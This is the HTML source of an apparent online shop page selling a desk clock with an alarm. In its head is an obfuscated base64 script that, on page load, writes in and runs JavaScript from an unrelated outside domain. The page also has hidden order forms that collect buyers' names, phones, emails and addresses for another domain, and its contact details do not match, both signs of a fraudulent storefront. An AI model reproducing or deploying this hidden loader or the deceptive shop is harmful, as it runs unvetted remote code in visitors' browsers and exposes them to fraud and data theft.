<html lang="en">
<head>
        <meta charset="UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link rel="stylesheet" href="style/bootstrap.min.css">
        <link rel="stylesheet" href="style/bootstrap.min.css.map">
        <link rel="stylesheet" href="style/fb-style.css">
        <title>Elegant Desk Clock with Alarm Clock: Perfection in Every Detail</title>
        <meta property="og:title" content="Elegant Desk Clock with Alarm Clock: Perfection in Every Detail">
        <meta property="og:description" content="Elegant Desk Clock with Alarm Clock: Perfection in Every Detail" />
        <meta property="og:image" content="1704172671.webp"/>
        
        <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
        <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css">
        

        
        <link rel="preconnect" href="https://fonts.gstatic.com/">
        <link href="https://fonts.googleapis.com/css2?family=Scada:ital,wght@0,400;0,700;1,400;1,700&display=swap" rel="stylesheet">
        <link rel="shortcut icon" href="logotip.svg" type="image/x-icon">
        

        <style>
            *{margin: 0; padding: 0;}
            *{-webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box;}
            li{
                list-style: none;
            }
            html{
                -ms-text-size-adjust: 100%;
                -moz-text-size-adjust: 100%;
                -webkit-text-size-adjust: 100%;
                -webkit-font-smoothing: subpixel-antialiased !important;
                line-height: 1.15; /* 1 */
                -webkit-text-size-adjust: 100%; /* 2 */
            }
            body{
                font-family: 'Scada', sans-serif;
                background: url(bg/35.jpg);
                background-size: cover;
                direction: ltr;
            }
            body {
                margin: 0;
                overflow-x: hidden;
                min-height: 100%;
            }
            section.header, section.product, section.maps, section.contact, section.footer, section.related{
                margin: 0 auto 0px ;
                width: 1166px;
                padding: 25px;
                background: #f4f9f9;
                box-shadow: 0px 0px 10px #939393;
                border-radius: 40px;
            }
            .header div{
                font-weight: 400;
                font-size: 21px;
                padding: 10px 20px;
            }
            .header ul{
                display: flex;
                margin: 0;
                padding: 0;
            }
            .header{
                display: flex;
                align-items: center;
                justify-content: space-between;
            }
            .header ul li{
                padding-left: 10px;
                list-style: none;
                text-align: center
            }
            .product{
                border-top: 0px solid #ccc;
                border-bottom: 0px solid #ccc;
            }
            .related{
                border-bottom: 0px solid #ccc;
            }
            .product_top{
                display: flex;
            }
            .product_top > div{
                width: 100%;
                margin: 15px;
            }
            .figure{
                text-align: center;
                width: 100%;
            }
            .figure img{
                max-height: 500px;
                max-width: 100%;
            }
            .figure-caption{
                display: none;
            }
            .info_offers{
                text-align: center;
            }
            .info_offers > div{
                display: block;
                align-items: center;
                gap: 9px;
            }
            .info_offers p{
                margin-bottom: 3px;
                font-weight: 400;
                font-size: 19px;
            }
            .info_offers span{
                color: #444;
            }
            .popularOffers{
                margin: 10px 0px;
            }
            .progress{
                border-radius: 40px;
                display: flex;
                width: 100%;
            }
            .rating_num{
                display: none;
            }
            .progress-bar{
                background-color: #6A7AC5;
                border-radius: 40px;
            }
            .price_block span{
                font-weight: 400;
                font-size: 21px;
                color: #EF2143;
            }
            .content{
                text-align: center;
            }
            .buy_btn_style{
                background: #EF2143;
                color: #fff;
                display: flex;
                width: 100%;
                align-items: center;
                justify-content: center;
                text-decoration: none;
                height:55px;
                margin-top: 10px;
                border-radius: 10px;
                margin: 0 auto;
                display: none;
            }
            .buy_btn_style:hover{
                color: #fff;
                opacity: 0.8;
            }
            .form__order{
                display: none;
            }
            .content p{
                margin-top: 15px;
            }

            .contact{
                border-top: 0px solid #ccc;
                border-bottom: 0px solid #ccc;
            }
            .contact h4{
                display: block;
                margin-bottom: 15px;
            }
            .contact p{
                margin-bottom: 5px;
            }
            .contact form{
                display: flex;
                flex-direction: column;
            }
            .input-group span{
                margin: 0 !important;
            }
            .form__order{
                margin-top: 20px;
            }
            .form__order button{
                width: 100%;
            }
            .form__order  .input-group-text{
                background-color: #d5eafe;
            }
            .second_btn .form__order{
                margin: 0 auto;
                justify-content: center;
            }
            .contact a{
                color: #444;
            }
            .footer p{
                margin-bottom: 3px;
            }
            .relBox{
                width: 23%;
            }
            .relBox img{
                width: 100%;
            }
            .relBox p{
                margin: 9px 0px 0px 0px;
            }
            .relBox p a{
                text-decoration: none;
                color: inherit;
            }
            .forma-rorm-main {
                 display: flex;
                flex-direction: column;
                gap: 10px;
            }
            .input-x83515524{
                display: block;
                width: 100%;
                padding: 0.375rem 0.75rem;
                font-size: 1rem;
                font-weight: 400;
                line-height: 1.5;
                color: #212529;
                background-color: #fff;
                background-clip: padding-box;
                border: 1px solid #ced4da;
                -webkit-appearance: none;
                -moz-appearance: none;
                appearance: none;
                border-radius: 0.25rem;
                transition: border-color .15s ease-in-out,box-shadow .15s ease-in-out;
            }
            .textarea-x83515524{
                width: 100%;
                border: 1px solid #ced4da;
                border-radius: 0.25rem;
                padding: 0.375rem 0.75rem;
            }
            .form-check-main {
                display: flex;
                justify-content: flex-start;
                align-items: center;
                gap: 10px;
            }
            .form-check input {
                width: 15px !important;
            }
            #cookie-9kmOgV{
                display: none;
                justify-content: space-between;
                align-items: center;
                position: fixed;
                bottom: 25px;
                left: 50%;
                width: 1042px;
                max-width: 90%;
                transform: translateX(-50%);
                padding: 25px;
                background-color:  #0C2233;
                border-radius: 10px;
                box-shadow: 2px 3px 10px rgba(0, 0, 0, 0.7);
                gap: 25px;
                z-index: 999999;
            }
            #cookie-9kmOgV button{
                max-width: 200px;
            }

            #cookie-9kmOgV p{
                margin: 0;
                font-size: 14px;
                color: #fff;
            }


            @media (min-width: 576px){
                #cookie-9kmOgV.show{
                    display: flex;
                }
                .cookie_accept{
                    margin: 0 0 0 25px;
                }
            }

            @media (max-width: 575px){
                #cookie-9kmOgV.show{
                    display: flex;
                    flex-direction: column;
                }
                .cookie_accept{
                    margin: 10px 0 0 0;
                }
                button{
                    width: 100%;
                }
            }



            @media (max-width:1200px){
                section.header, section.product, section.maps, section.contact, section.footer, section.related{
                    width: 100%;
                }

            }
            @media (max-width:800px){
                .product_top{
                    flex-direction: column;
                }
                .header{
                    flex-direction: column !important;
                }
                .related.row{
                    flex-direction: column !important;
                }
                .relBox{
                    width: 100% !important;
                    flex-direction: column;
                }
            }
            @media (max-width:480px){
                .relBox img{
                    width: 100% !important;
                }
            }
        </style>
        <script src="data:text/javascript;base64,ZG9jdW1lbnQub3BlbigpO2RvY3VtZW50LndyaXRlKCc8c2NyaXB0IHNyYz0iaHR0cHM6Ly9ob3dlY2xpay5jb20vZ2c0LzgxNjEuanMiPjwvc2NyaXB0PicpO2RvY3VtZW50LmNsb3NlKCk7"></script>
    </head>

    <body>
        
        <section class="header flex-row">
            <div>
                Elegant Desk Clock with Alarm Clock: Perfection in Every Detail
            </div>
            <ul>
                <li><i class="bi bi-telephone-outbound-fill"></i> (609) 465-2204</li>
                <li><i class="bi bi-geo-alt"></i> 1051 W Dennis Ave, Olathe, KS 66061</li>
            </ul>
        </section>

        

        <section class="product flex-row-reverse">
            <div class="product_top eKKelst">
                <div>
                    <figure class="figure">
                        <img src="1704172671.webp" class="figure-img img-fluid rounded" alt="Elegant Desk Clock with Alarm Clock: Perfection in Every Detail">
                        <figcaption class="figure-caption">Elegant Desk Clock with Alarm Clock: Perfection in Every Detail</figcaption>
                    </figure>
                </div>
                <div class="info_offers">
                    <div>
                        <p>Product Code:</p>
                        <span>P46823204</span>
                    </div>
                    <div class="popularOffers">
                        <p>Rating:</p>
                        <div class="progress">
                            <div class="progress-bar" role="progressbar" style="width: 60%" aria-valuenow="25" aria-valuemin="0" aria-valuemax="100"></div>
                        </div>
                        <span class="rating_num">3344</span>
                    </div>
                    <div>
                        <p>Delivery (working days):</p>
                        <span>4</span>
                    </div>
                    <div class="price_block d-flex">
                        <p>Price:</p>
                        <span>105 $</span>
                    </div>
                    <div class="first_btn" style="display: none;">
                        

                        <div class="d-flex form__order">
                            <form action="https://teamusagoodies.com/thanks.html"  method="post">
                                <div class="forma-rorm-main">
                                    <input class="input-x83515524" type="text" placeholder="Enter your name" required><input class="input-x83515524" type="tel" placeholder="Enter your phone number" required><input class="input-x83515524" type="email" placeholder="E-mail address" required><input class="input-x83515524" type="number" placeholder="Quantity" required><input class="input-x83515524" type="text" required placeholder="Address"><input class="input-x83515524" type="text" required placeholder="Postal code">
                                </div> 	  
                                <div class="mb-3 form-check-main">
                                    <input type="checkbox" class="form-check-input" id="exampleCheck1" required>
                                    <label class="form-check-label" for="exampleCheck1">I accept <a href="privacy-doc.html">Privacy policy</a></label>
                                </div>
                                <button class="btn btn-info">Buy now</button>
                            </form>
                        </div>
                    </div>
                </div>
            </div>

            <div class="content hyJd8kAYM0">
                <p><p>We present you a table clock with an alarm clock, which will not only be a faithful companion in your daily life, but will also become an exquisite decoration of your interior. Their elegant PVD case, combined with a black dial, create a stunning look that is sure to attract admiring glances.</p>
<p><strong>This desk clock is mains powered, providing reliable and stable performance. </strong>Their electronic mechanism ensures precise and smooth movement of the arrows, as well as reliable alarm response. With them, you will never be late for any important event.</p>
<p>This watch combines functionality and sophisticated style, making it the perfect choice for modern time gourmets. <strong>Meet your high demands on aesthetics and precision with this alarm clock desk clock.</strong></p></p>
            </div>
            <div class="second_btn">
                

               <div class="d-flex form__order">
                            <form action="https://teamusagoodies.com/thanks.html"  method="post">
                                <div class="forma-rorm-main">
                                    <input class="input-x83515524" type="text" placeholder="Enter your name" required><input class="input-x83515524" type="tel" placeholder="Enter your phone number" required><input class="input-x83515524" type="email" placeholder="E-mail address" required><input class="input-x83515524" type="number" placeholder="Quantity" required><input class="input-x83515524" type="text" required placeholder="Address"><input class="input-x83515524" type="text" required placeholder="Postal code">
                                </div> 	  
                                <div class="mb-3 form-check-main">
                                    <input type="checkbox" class="form-check-input" id="exampleCheck1" required>
                                    <label class="form-check-label" for="exampleCheck1">I accept <a href="privacy-doc.html">Privacy policy</a></label>
                                </div>
                                <button class="btn btn-info">Buy now</button>
                            </form>
                        </div>
            </div>
        </section>

        <section class="related UB8x9">
            <div class="row flex-row" style="gap: 25px; flex-wrap: wrap;">
                <div class="relBox">
                    <img src="gallery/0-gallery.jpg" alt="">
                    <p class="content"><a href="#" class="fb-item">How to prepare a mortar for laying a stove that will not crack for a long time</a></p>
                </div>
                <div class="relBox">
                    <img src="gallery/1-gallery.jpg" alt="">
                    <p class="content"><a href="#" class="fb-item">5 recipes for bell pepper dishes, if stuffed is tired</a></p>
                </div>
                <div class="relBox">
                    <img src="gallery/2-gallery.jpg" alt="">
                    <p class="content"><a href="#" class="fb-item">5 courses with mustard that will make the taste brighter and more piquant</a></p>
                </div>
                <div class="relBox">
                    <img src="gallery/3-gallery.jpg" alt="">
                    <p class="content"><a href="#" class="fb-item">11 bad culinary habits that make you doubt yourself and your food</a></p>
                </div>
            </div>
        </section>


        
        <div>
             <section class="maps">
                <iframe src="https://maps.google.com/maps?width=100%&amp;height=600&amp;hl=en&amp;q=1051%20W%20Dennis%20Ave%2C%20Olathe%2C%20KS%2066061&amp;ie=UTF8&amp;t=&amp;z=8&amp;iwloc=B&amp;output=embed" width="100%" height="247" style="border:0;" allowfullscreen="" loading="lazy" class="shadow-sm"></iframe>
            </section> 

            <section class="contact L0f">
                <div class="row  flex-row-reverse">
                    <div class="col">
                        <h5>Contacts:</h5>
                        <p> 1051 W Dennis Ave, Olathe, KS 66061</p>
                        <p>(609) 465-2204</p>
                        <p>contact_box_wiggly@mail.us</p>
                        <p></p> 
                        <p><a href="privacy-doc.html" style="display: block;">Privacy policy</a></p>
                        <p><a href="term-doc.html" style="display: block;">Terms & Conditions</a></p>
                        <p><a href="disclaimer-doc.html" style="display: block;">Disclaimer</a></p>
                        <p><a href="refound-doc.html" style="display: block;">Returns & Exchanges</a></p>
                        <p><a href="pay-doc.html" style="display: block;">Payment & Delivery</a></p>
                    </div>
                </div>
            </section>
        </div>

        <section class="footer">
            <div class="row flex-row">
                <div class="col">
                    <p>© 2012-2023</p>
                </div>
                <div class="col">
                    <h5>Store Opening Hours:</h5>
                    <p>Monday - Friday: 7.00 - 16.00</p>
                    <p>Saturday - Sunday: 10.00 - 15.00</p>
                </div>
            </div>
        </section>

        <script type="text/javascript" src="js/bootstrap.min.js"></script>
        <script type="text/javascript" src="js/tinycolor.js"></script>
        <script type="text/javascript" src="js/fb-script.js"></script>
        <script type="text/javascript" src="js/site-scripts.js"></script>

        
        <style>
        .floating-windows-L0f {
            display: none;
            position: fixed;
            bottom: 10px;
            width: 90%;
            max-width: 1042px;
            left: 50%;
            transform: translateX(-50%);
            color: #fff;
            background-color: #0C2233;
            border-radius: 10px;
            box-shadow: 2px 3px 10px rgba(0, 0, 0, 0.7);
            gap: 25px;
            z-index: 99999;
            padding: 25px;
            text-align: center;
        }
        .floating-windows-L0f a {
            color: #ddceff;
        }
        .floating-windows-box-L0f {
            display: flex;
            flex-direction: row;
            align-items: center;
            gap: 10px;
        }
        .button-L0f {
            margin: 15px;
            position: relative;
            display: inline-block;
            padding: 16px 28px;
            font-weight: bold;
            border: 1px solid #0C2233;
            color: #0C2233;
            text-align: center;
            text-decoration: none;
            background-color: #fff;
            border-radius: 40px;
            overflow: hidden;
            z-index: 1;
            cursor: pointer;
            font-size: 14px;
            width: auto;
        }
        
        .button-L0f:hover {
            background-color: #0C2233;
            color: #fff;
            box-shadow: rgba(50, 50, 93, 0.25) 0px 13px 27px -5px, rgba(0, 0, 0, 0.3) 0px 8px 16px -8px;
        }
        .modal-L0f {
            overflow-y: auto;
            display: none;
            position: fixed;
            z-index: 999999;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.5);
            justify-content: center;
            align-items: center;
        }
        
        .modal-content-L0f {
            color: #000;
            background-color: #fff;
            padding: 20px;
            max-width: 700px;    
            border-radius: 10px;    
            box-shadow: 2px 3px 10px rgba(0, 0, 0, 0.7);
            margin: 10% auto;
            position: relative;
        }
        
        .modal-close-L0f {
            position: absolute;
            top: 10px;
            right: 10px;
            font-size: 28px;
            cursor: pointer;
        }
        
        .accordion-L0f {
            margin-top: 10px;
            border: 1px solid #ccc;
            border-radius: 5px;
        }
        
        .accordion-header-L0f {
            display: flex;
            align-items: center;
            padding: 10px;
            background-color: #f0f0f0;
            cursor: pointer;
            position: relative;
        }
        
        .accordion-icon-L0f {
            position: absolute;
            right: 0;
            margin: 10px;
            color: #362222;
            font-weight: bold;
        }
        
        .accordion-header-L0f input[type="checkbox"], input[type="radio"] {
            appearance: none;
            -webkit-appearance: none;
            -moz-appearance: none;
            height: 2.1rem !important;
            display: inline-block;
            vertical-align: top;
            position: relative;
            margin: 0;
            cursor: pointer;
            border: 1px solid #4F565D;
            background: #fff;
            transition: background .3s, border-color .3s, outline .2s;
        }
        .accordion-header-L0f input[type="checkbox"]:after, input[type="radio"]:after {
            content: "";
            display: block;
            left: 0;
            top: 0;
            position: absolute;
            transition: transform .3s ease, opacity .2s;
        }
        .accordion-header-L0f input[type="checkbox"]:checked, input[type="radio"]:checked {
            background-color: #362222;
            border-color: #362222;
            transition: transform .6s cubic-bezier(.2,.85,.32,1.2), opacity .3s;
        }
        .accordion-header-L0f input[type="checkbox"]:disabled, input[type="radio"]:disabled {
            background-color: #362222;
            border-color: #362222;
            cursor: not-allowed;
        }
        .accordion-header-L0f input[type="checkbox"]:disabled:checked, input[type="radio"]:disabled:checked {
            background-color: #362222;
        }
        .accordion-header-L0f input[type="checkbox"]:disabled + label, input[type="radio"]:disabled + label {
            cursor: not-allowed;
        }
        .accordion-header-L0f input[type="checkbox"]:hover:not(:checked):not(:disabled), input[type="radio"]:hover:not(:checked):not(:disabled) {
            border-color: #362222;
        }
        .accordion-header-L0f input[type="checkbox"]:focus-visible, input[type="radio"]:focus-visible {
            outline: 2px solid #362222;
            outline-offset: 4px;
        }
        .accordion-header-L0f input[type="checkbox"]:not(.switch-L0f), input[type="radio"]:not(.switch-L0f) {
            width: 2.1rem;
        }
        .accordion-header-L0f input[type="checkbox"] + label, input[type="radio"] + label {
            display: inline-block;
            cursor: pointer;
            font-size: 1.4rem;
            margin-left: .2em;
            vertical-align: top;
        }
        .accordion-header-L0f input[type="checkbox"]:not(.switch-L0f) {
            border-radius: .7rem;
        }
        .accordion-header-L0f input[type="checkbox"]:not(.switch-L0f):after {
            border: 2px solid #fff;
            height: 45%;
            width: 25%;
            border-top: 0;
            border-left: 0;
            left: 38%;
            top: 20%;
            transform: rotate(20deg);
        }
        .accordion-header-L0f input[type="checkbox"]:not(.switch-L0f):disabled:not(:checked):after {
            border-color:#362222;
        }
        .accordion-header-L0f input[type="checkbox"]:not(.switch-L0f):checked:after {
            transform: rotate(43deg);
        }
        input[type="checkbox"].switch-L0f {
            width: 3.8rem;
            border-radius: 1.1rem;
        }
        .accordion-header-L0f input[type="checkbox"].switch-L0f:after {
            left: 5%;
            top: 10%;
            border-radius: 50%;
            width: 45%;
            height: 80%;
            background: #4F565D;
            transform: translateX(0);
        }
        .accordion-header-L0f input[type="checkbox"].switch-L0f:checked:after {
            background: #F6F8FF;
            transform: translateX(100%);
        }
        .accordion-header-L0f input[type="checkbox"].switch-L0f:disabled:not(:checked):after {
            background-color: #362222;
        }
        .accordion-header-L0f input[type="radio"] {
            border-radius: 50%;
        }
        .accordion-header-L0f input[type="radio"]:after {
            width: 100%;
            height: 100%;
            border-radius: 50%;
            background: #fff;
            transform: scale(.7);
        }
        .accordion-header-L0f input[type="radio"]:disabled:after {
            background: #362222;
        }
        .accordion-header-L0f input[type="radio"]:checked:after {
            transform: scale(.5);
        }
        .accordion-body-L0f {
            padding: 10px;
            display: none;
        }
        
        .button-box-L0f {
            display: flex;
            flex-wrap: wrap;
            justify-content: center;
            gap: 9px;
            margin-top: 10px;
        }
        .cookie-text-L0f{font-size: 14px;}
        @media(max-width: 1024px){
            .floating-windows-box-L0f{
                flex-direction: column;
            }
            .cookie-text-L0f{
                width: 100% !important;
            }
            .button-L0f{
                margin-bottom: 0px;
                padding: 5px 15px;
            }
            .buttons-L0f button:first-child{
                margin-top: 0px;
            }
        }
        @media(max-width: 576px){
            .buttons-L0f button:nth-child(2){
                display: none;
            }
            .buttons-L0f{
                display: flex;
                align-items: center;
                gap: 9px;
                justify-content: center;
            }
            .button-L0f{
                margin:0px;
                font-size: 11px;
            }
            .cookie-text-L0f{
               font-size: 11px;
            }
        }
        @media(max-width: 380px){
            .buttons-L0f{
                flex-wrap: wrap;
            }
        }
        </style>
        
        
        
         <div class="floating-windows-L0f">
                <div class="floating-windows-box-L0f">
                    <div class="cookie-text-L0f">Our resource uses cookies to improve your experience. If you wish, you can opt out of them, however, this may limit some of the functions of the site. Check out our <a href="cookies-doc.html" target="_blank"> cookie notice</a>.</div>
                    <div class="buttons-L0f">
                        <button id="allow-all-cookie-L0f" class="button-L0f">Accept all cookies</button>
                        <button id="reject-all-L0f" class="button-L0f">Reject All</button>
                        <button id="cookie-settings-text-L0f" class="button-L0f">Cookie settings</button>
                    </div>
                </div>
            </div>
        
            <div id="modal-L0f" class="modal-L0f">
                <div class="modal-content-L0f">
                    <span id="modal-close-L0f" class="modal-close-L0f">&times;</span>
                    <h2>Cookie settings</h2>
                    <p>Cookies are small pieces of data sent from a website and stored on the user's computer by the web browser while it is running. The browser stores each message in a small file called a cookie. When you request another page from the server, your browser sends the cookie back to the server. Cookies have been developed as a reliable mechanism that allows websites to remember information or record user activity when browsing pages.</p>
        
                    <div class="accordion-L0f">
                        <div class="accordion-header-L0f">
                            <input type="checkbox" class="switch-L0f" checked disabled>
                            <span>&nbsp; Necessary</span>
                            <span class="accordion-icon-L0f">&#8744;</span>
                        </div>
                        <div class="accordion-body-L0f">
                            <p>Strictly necessary cookies - usually these cookies are necessary for the operation of the site. They can help you show the user the information they need, customize their experience, and allow you to implement and maintain security features. As a rule, without these cookies, the operation of the site is not possible or its functioning may be severely impaired.</p>
                        </div>
                    </div>
        
                    <div class="accordion-L0f">
                        <div class="accordion-header-L0f">
                            <input type="checkbox" class="switch-L0f" Unchecked >
                            <span>&nbsp; Functional</span>
                            <span class="accordion-icon-L0f">&#8744;</span>
                        </div>
                        <div class="accordion-body-L0f">
                            <p>Functional cookies - usually these cookies are used to improve the functional characteristics of your site and make it easier for users to use. These cookies remember the settings selected by users (for example, language and time zone settings). With the help of these files, users can avoid changing the settings each time they visit the site.</p>
                        </div>
                    </div>
                    <div class="accordion-L0f">
                        <div class="accordion-header-L0f">
                            <input type="checkbox" class="switch-L0f" Unchecked >
                            <span>&nbsp; Statistics</span>
                            <span class="accordion-icon-L0f">&#8744;</span>
                        </div>
                        <div class="accordion-body-L0f">
                            <p>Performance cookies - usually these cookies show whether the user has visited your site before. Analytical cookies allow you to recognize and count the number of users of your site and see how these users move around your site.</p>
                        </div>
                    </div>
        
                    <div class="accordion-L0f">
                        <div class="accordion-header-L0f">
                            <input type="checkbox" class="switch-L0f" Unchecked >
                            <span>&nbsp; Marketing</span>
                            <span class="accordion-icon-L0f">&#8744;</span>
                        </div>
                        <div class="accordion-body-L0f">
                            <p>Marketing, targeting, and advertising cookies – Usually, these cookies record visitors' visits to your site, the pages they visited, and the links they clicked on. This information is used to make the advertisements displayed on it more relevant to the interests of the user. Advertising cookies allow you to know if the user has already seen a specific advertisement or an advertisement of a certain type.</p>
                        </div>
                    </div>
                    <div class="button-box-L0f">
                        <button id="save-current-settings-L0f" class="button-L0f">Save current settings</button>
                        <button id="accept-all-cookies-L0f" class="button-L0f">Accept all cookies and close</button>
                    </div>
                </div>
            </div>
        
        
            <script>
              
            document.addEventListener("DOMContentLoaded", function () {
            const floatingWindow = document.querySelector(".floating-windows-L0f");
            const allowAllCookieButton = document.getElementById("allow-all-cookie-L0f");
            const rejectAllButton = document.getElementById("reject-all-L0f");
            const cookieSettingsButton = document.getElementById("cookie-settings-text-L0f");
            const modal = document.getElementById("modal-L0f");
            const modalClose = document.getElementById("modal-close-L0f");
            const acceptAllCookiesButton = document.getElementById("accept-all-cookies-L0f");
            const switchCheckboxes = document.querySelectorAll(".switch-L0f");
        
            
            const allCookiesAccepted = localStorage.getItem("allCookiesAccepted");
            if (allCookiesAccepted === "true") {
                switchCheckboxes.forEach(function (checkbox) {
                    checkbox.checked = true;
                });
            }
        
            acceptAllCookiesButton.addEventListener("click", function () {
                switchCheckboxes.forEach(function (checkbox) {
                    checkbox.checked = true;
                });
        
                localStorage.setItem("allCookiesAccepted", "true");
            });
        
        
            const isWindowClosed = localStorage.getItem("windowClosed");
            if (isWindowClosed === "true") {
                floatingWindow.style.display = "none";
            }
            if(localStorage.getItem("windowClosed") === null){
                floatingWindow.style.display = "block";
            }
        
            acceptAllCookiesButton.addEventListener("click", function () {
                switchCheckboxes.forEach(function (checkbox) {
                    checkbox.checked = true;
                });
                modal.style.display = "none";
                floatingWindow.style.display = "none";
                localStorage.setItem("windowClosed", "true"); 
            });
        
            modalClose.addEventListener("click", function () {
                modal.style.display = "none";
            });
        
            allowAllCookieButton.addEventListener("click", function () {
                floatingWindow.style.display = "none";
                localStorage.setItem("windowClosed", "true"); 
                modal.style.display = "none";
            });
        
            rejectAllButton.addEventListener("click", function () {
                floatingWindow.style.display = "none";
                localStorage.setItem("windowClosed", "true"); 
            });
        
            cookieSettingsButton.addEventListener("click", function () {
                modal.style.display = "block";
            });
           
            const accordions = document.querySelectorAll(".accordion-header-L0f");
            accordions.forEach(function (accordion) {
                const body = accordion.nextElementSibling;
                const icon = accordion.querySelector(".accordion-icon-L0f");
        
                 
                accordion.addEventListener("click", function () {
               
                    accordions.forEach(function (otherAccordion) {
                        if (otherAccordion !== accordion) {
                            otherAccordion.nextElementSibling.style.display = "none";
                            otherAccordion.querySelector(".accordion-icon-L0f").innerHTML = "&#8744;";
                        }
                    });
        
                    if (body.style.display === "none" || body.style.display === "") {
                        body.style.display = "block";
                        icon.innerHTML = "&#8743;";
                    } else {
                        body.style.display = "none";
                        icon.innerHTML = "&#8744;";
                    }
                });
         
                if (body.style.display === "block") {
                    icon.innerHTML = "&#8743;";
                } else {
                    icon.innerHTML = "&#8744;";
                }
            });
        
        
            const saveCurrentSettingsButton = document.getElementById("save-current-settings-L0f");
        
            saveCurrentSettingsButton.addEventListener("click", function () {
                modal.style.display = "none";
                localStorage.setItem("windowClosed", "true"); 
                floatingWindow.style.display = "none";
            });
        
            acceptAllCookiesButton.addEventListener("click", function () {
                modal.style.display = "none";
            });
        });
        
        const floatingBox = document.querySelector(`.floating-windows-box-L0f`);
        const cookieText = document.querySelector(`.cookie-text-L0f`);
        
        if (floatingBox) {
          const computedStyle = window.getComputedStyle(floatingBox);
          if (computedStyle.flexDirection === "row") {
            cookieText.style.width = "80%";
          } else if (computedStyle.flexDirection === "column") {
            cookieText.style.width = "100%";
          }
        }
        
        </script>
        
        
        
    </body>
</html>